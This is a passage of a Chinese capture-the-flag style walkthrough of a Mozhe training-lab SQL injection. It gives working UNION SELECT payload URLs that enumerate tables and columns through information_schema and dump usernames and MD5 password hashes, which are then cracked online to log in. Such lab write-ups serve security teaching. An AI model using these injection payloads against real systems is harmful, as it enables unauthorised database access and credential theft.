文章插图
,1时为空,说明只有两个表、
06.爆破得数据库列名及类型
页面提交:
http://219.153.49.228:48917/new_list.php?id=1and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNSwhere TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member'limit 0,1
数据库执行:
select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 0,1
页面:
文章插图
在原来的标题上位置显示为id,内容的位置显示为int(11)
分析解说:查询数据库oup的表中的第一个字段名称与类型,第一个名称为id,类型:整型int(11) 。
以此类推,分别查询第二个字段,第三个字段
limit 1,1
文章插图
第二个字段是用户名,为型,长度为20以内
limit 2,1
文章插图
第三个字段是密码,为型,长度为255以内
,1
文章插图
第四个字段是,为int型,长度为11以内
,1页面为空,说明一共有四个字段
id,name,,
07.查询用户数据总数
页面提交:
http://219.153.49.228:48917/new_list.php?id=1 and 1=2 union select 1,count(*),3,4 from mozhe_Discuz_StormGroup.StormGroup_member
数据库执行:
select * from news where id=1 and 1=2 union select 1,count(*),3,4 from mozhe_Discuz_StormGroup.StormGroup_member
页面:
文章插图
查询数据库oup的表中数据总数,共有2条数据,即有两个用户的数据
08.爆破得用户名及密码
使用()函数
页面提交:
http://219.153.49.228:48917/new_list.php?id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1
数据库执行:
select * from news where id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1
页面:
文章插图
一共有两个用户数据,故我们再查询,1
文章插图
经过观察,密码的形式似乎经过MD5加密,经过在线网站转码之后即可获得正确的密码 。
注意:代表用户是否可用,只有=1才可以登录网站
09.登录获得KEY
- CSDN技术训练营——长沙理工大学
- 墨者学院 SQL注入之报错盲注
- 布尔盲注 墨者学院——SQL注入漏洞测试
- Postmaster PG守护进程——主进程文件postmaster.pid
- 时间盲注 墨者学院SQL注入(手动注入+sqlmap+对于注入语句中的那个 ’
- 记在墨者学院业务逻辑漏洞靶场实战感受
- elsevier latex模板_学术论文写作利器—— VS Code + La
- 边框的特殊用法——平行四边形页签
- [AFCTF2018]Morse
- 超详细 墨者学院-入门级-浏览器信息伪造-小白必看